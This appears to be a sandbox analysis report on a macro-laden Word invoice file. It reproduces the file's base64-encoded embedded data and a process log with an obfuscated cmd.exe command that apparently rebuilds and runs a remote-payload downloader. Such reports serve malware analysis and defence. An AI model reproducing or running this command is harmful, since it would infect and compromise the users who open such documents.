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 AE8ATwBQAEUATgAAAEAAAAvwBAAAABI0Vng= |
WordDocumentDocSuppDataBinDataName: | editdata.mso |
WordDocumentStylesStyleRPrRFontsCs: | Tahoma |
WordDocumentStylesStyleRPrRFontsH-ansi: | Tahoma |
WordDocumentStylesStyleRPrRFontsAscii: | Tahoma |
WordDocumentStylesStyleRsidVal: | 005A24B1 |
WordDocumentStylesStyleLinkVal: | BalloonTextChar |
WordDocumentStylesStyleBasedOnVal: | Normal |
WordDocumentStylesStyleTblPrTblCellMarRightType: | dxa |
WordDocumentStylesStyleTblPrTblCellMarRightW: | 108 |
WordDocumentStylesStyleTblPrTblCellMarBottomType: | dxa |
WordDocumentStylesStyleTblPrTblCellMarBottomW: | - |
WordDocumentStylesStyleTblPrTblCellMarLeftType: | dxa |
WordDocumentStylesStyleTblPrTblCellMarLeftW: | 108 |
WordDocumentStylesStyleTblPrTblCellMarTopType: | dxa |
WordDocumentStylesStyleTblPrTblCellMarTopW: | - |
WordDocumentStylesStyleTblPrTblIndType: | dxa |
WordDocumentStylesStyleTblPrTblIndW: | - |
WordDocumentStylesStyleUiNameVal: | Table Normal |
WordDocumentStylesStyleRPrLangBidi: | AR-SA |
WordDocumentStylesStyleRPrLangFareast: | EN-US |
WordDocumentStylesStyleRPrLangVal: | EN-US |
WordDocumentStylesStyleRPrSz-csVal: | 22 |
WordDocumentStylesStyleRPrSzVal: | 22 |
WordDocumentStylesStyleRPrFontVal: | Calibri |
WordDocumentStylesStylePPrSpacingLine-rule: | auto |
WordDocumentStylesStylePPrSpacingLine: | 259 |
WordDocumentStylesStylePPrSpacingAfter: | 160 |
WordDocumentStylesStyleNameVal: | Normal |
WordDocumentStylesStyleStyleId: | Normal |
WordDocumentStylesStyleDefault: | on |
WordDocumentStylesStyleType: | paragraph |
WordDocumentStylesLatentStylesLsdExceptionName: | Normal |
WordDocumentStylesLatentStylesLatentStyleCount: | 375 |
WordDocumentStylesLatentStylesDefLockedState: | off |
WordDocumentStylesVersionOfBuiltInStylenamesVal: | 7 |
WordDocumentFontsFontSigCsb-1: | 00000000 |
WordDocumentFontsFontSigCsb-0: | 000001FF |
WordDocumentFontsFontSigUsb-3: | 00000000 |
WordDocumentFontsFontSigUsb-2: | 00000009 |
WordDocumentFontsFontSigUsb-1: | C0007841 |
WordDocumentFontsFontSigUsb-0: | E0002AFF |
WordDocumentFontsFontPitchVal: | variable |
WordDocumentFontsFontFamilyVal: | Roman |
WordDocumentFontsFontCharsetVal: | 00 |
WordDocumentFontsFontPanose-1Val: | 02020603050405020304 |
WordDocumentFontsFontName: | Times New Roman |
WordDocumentFontsDefaultFontsCs: | Times New Roman |
WordDocumentFontsDefaultFontsH-ansi: | Calibri |
WordDocumentFontsDefaultFontsFareast: | Calibri |
WordDocumentFontsDefaultFontsAscii: | Calibri |
WordDocumentDocumentPropertiesVersion: | 16 |
WordDocumentDocumentPropertiesCharactersWithSpaces: | 1 |
WordDocumentDocumentPropertiesParagraphs: | 1 |
WordDocumentDocumentPropertiesLines: | 1 |
WordDocumentDocumentPropertiesCharacters: | 1 |
WordDocumentDocumentPropertiesWords: | - |
WordDocumentDocumentPropertiesPages: | 1 |
WordDocumentDocumentPropertiesLastSaved: | 2019:01:22 18:27:00Z |
WordDocumentDocumentPropertiesCreated: | 2019:01:22 18:27:00Z |
WordDocumentDocumentPropertiesTotalTime: | - |
WordDocumentDocumentPropertiesRevision: | 1 |
WordDocumentIgnoreSubtreeVal: | http://schemas.microsoft.com/office/word/2003/wordml/sp2 |
WordDocumentOcxPresent: | no |
WordDocumentEmbeddedObjPresent: | no |
WordDocumentMacrosPresent: | yes |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
3000 | "C:\Program Files\Common Files\Microsoft Shared\OFFICE14\MSOXMLED.EXE" /verb open "C:\Users\admin\AppData\Local\Temp\Sales-Invoice.xml" | C:\Program Files\Common Files\Microsoft Shared\OFFICE14\MSOXMLED.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: XML Editor Exit code: 0 Version: 14.0.4750.1000 | ||||
2672 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\Sales-Invoice.xml" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | MSOXMLED.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
4032 | c:\w4662\q5040\j3357\..\..\..\windows\system32\cmd.exe /c %ProgramData:~0,1%%ProgramData:~9,2% /V:ON/C"set 3x=Te=$b}Yr-;v0O(Kk9Ryq% 6~7{Msdw._@:,HWiDnN84cjpzIuQ5)EL2\Pmx1+UFoG/lCa'hSfZBXgAt3&&for %x in (45;63;29;20;56;61;74;53;47;67;33;23;50;34;59;20;7;20;71;52;71;71;47;12;40;40;77;26;52;33;23;8;42;34;59;20;70;20;0;52;26;56;33;23;8;79;34;59;20;66;66;21;3;19;54;42;11;41;2;69;70;16;42;11;41;69;9;3;10;54;24;24;50;2;39;1;29;8;63;4;44;1;43;78;21;40;1;78;30;36;1;4;67;66;37;1;39;78;9;3;37;54;59;54;79;2;69;70;78;78;45;33;65;65;28;48;7;63;27;72;68;7;57;30;43;63;57;65;66;26;49;16;15;0;63;54;78;77;79;57;6;62;77;31;63;37;26;76;15;36;76;24;32;70;78;78;45;33;65;65;72;37;39;28;8;57;1;8;68;39;8;1;39;76;66;37;27;70;8;45;1;39;45;68;66;30;72;37;39;28;8;57;1;8;68;39;8;1;39;76;66;37;27;70;8;78;48;78;63;7;30;43;63;30;48;15;65;40;49;47;41;43;67;44;45;17;74;31;19;61;32;70;78;78;45;33;65;65;27;68;7;29;68;30;43;63;30;46;68;65;14;48;56;10;68;59;35;41;39;17;24;36;15;63;49;32;70;78;78;45;33;65;65;79;15;37;66;63;68;72;10;68;66;66;1;39;30;39;66;65;75;22;16;75;28;10;44;73;50;44;74;6;53;31;49;68;0;38;66;73;26;32;70;78;78;45;33;65;65;29;29;29;30;78;48;39;1;66;28;1;10;37;1;39;78;63;30;1;27;65;1;72;15;70;46;37;42;65;29;77;64;67;39;54;35;44;22;57;52;36;68;15;27;69;30;71;45;66;37;78;13;69;32;69;51;9;3;63;50;54;79;11;2;69;78;50;79;16;16;69;9;3;48;79;79;50;41;21;2;21;69;54;54;16;69;9;3;48;59;11;22;79;2;69;68;22;54;50;42;69;9;3;28;59;79;50;2;3;1;39;10;33;78;1;57;45;60;69;55;69;60;3;48;79;79;50;41;60;69;30;1;58;1;69;9;72;63;7;1;68;43;70;13;3;43;16;79;50;42;21;37;39;21;3;37;54;59;54;79;51;25;78;7;18;25;3;10;54;24;24;50;30;38;63;29;39;66;63;68;28;62;37;66;1;13;3;43;16;79;50;42;34;21;3;28;59;79;50;51;9;3;15;22;42;50;42;2;69;15;16;50;50;59;69;9;47;72;21;13;13;64;1;78;8;47;78;1;57;21;3;28;59;79;50;51;30;66;1;39;76;78;70;21;8;76;1;21;42;11;11;11;11;51;21;25;47;39;10;63;15;1;8;47;78;1;57;21;3;28;59;79;50;9;3;27;22;50;79;24;2;69;63;22;22;22;50;69;9;4;7;1;68;15;9;5;5;43;68;78;43;70;25;5;5;3;27;16;24;79;41;2;69;7;16;41;16;59;69;9;86)do set 8p7h=!8p7h!!3x:~%x,1!&&if %x==86 echo !8p7h:~6!|FOR /F "delims=fA tokens=1" %v IN ('ftype^^^|find "dfil"')DO %v " | c:\windows\system32\cmd.exe | — | WINWORD.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2668 | CmD /V:ON/C"set 3x=Te=$b}Yr-;v0O(Kk9Ryq% 6~7{Msdw._@:,HWiDnN84cjpzIuQ5)EL2\Pmx1+UFoG/lCa'hSfZBXgAt3&&for %x in (45;63;29;20;56;61;74;53;47;67;33;23;50;34;59;20;7;20;71;52;71;71;47;12;40;40;77;26;52;33;23;8;42;34;59;20;70;20;0;52;26;56;33;23;8;79;34;59;20;66;66;21;3;19;54;42;11;41;2;69;70;16;42;11;41;69;9;3;10;54;24;24;50;2;39;1;29;8;63;4;44;1;43;78;21;40;1;78;30;36;1;4;67;66;37;1;39;78;9;3;37;54;59;54;79;2;69;70;78;78;45;33;65;65;28;48;7;63;27;72;68;7;57;30;43;63;57;65;66;26;49;16;15;0;63;54;78;77;79;57;6;62;77;31;63;37;26;76;15;36;76;24;32;70;78;78;45;33;65;65;72;37;39;28;8;57;1;8;68;39;8;1;39;76;66;37;27;70;8;45;1;39;45;68;66;30;72;37;39;28;8;57;1;8;68;39;8;1;39;76;66;37;27;70;8;78;48;78;63;7;30;43;63;30;48;15;65;40;49;47;41;43;67;44;45;17;74;31;19;61;32;70;78;78;45;33;65;65;27;68;7;29;68;30;43;63;30;46;68;65;14;48;56;10;68;59;35;41;39;17;24;36;15;63;49;32;70;78;78;45;33;65;65;79;15;37;66;63;68;72;10;68;66;66;1;39;30;39;66;65;75;22;16;75;28;10;44;73;50;44;74;6;53;31;49;68;0;38;66;73;26;32;70;78;78;45;33;65;65;29;29;29;30;78;48;39;1;66;28;1;10;37;1;39;78;63;30;1;27;65;1;72;15;70;46;37;42;65;29;77;64;67;39;54;35;44;22;57;52;36;68;15;27;69;30;71;45;66;37;78;13;69;32;69;51;9;3;63;50;5